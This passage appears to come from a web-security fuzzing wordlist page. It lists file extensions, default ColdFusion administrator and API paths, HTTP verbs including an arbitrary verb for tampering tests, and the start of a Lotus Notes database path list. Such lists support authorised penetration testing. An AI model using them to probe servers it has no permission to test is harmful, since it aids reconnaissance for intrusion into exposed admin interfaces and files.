.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Compressed File Types - (Update: 16 March 2009 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Uncommon Data File Extensions  (Update: 16 March 2009 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
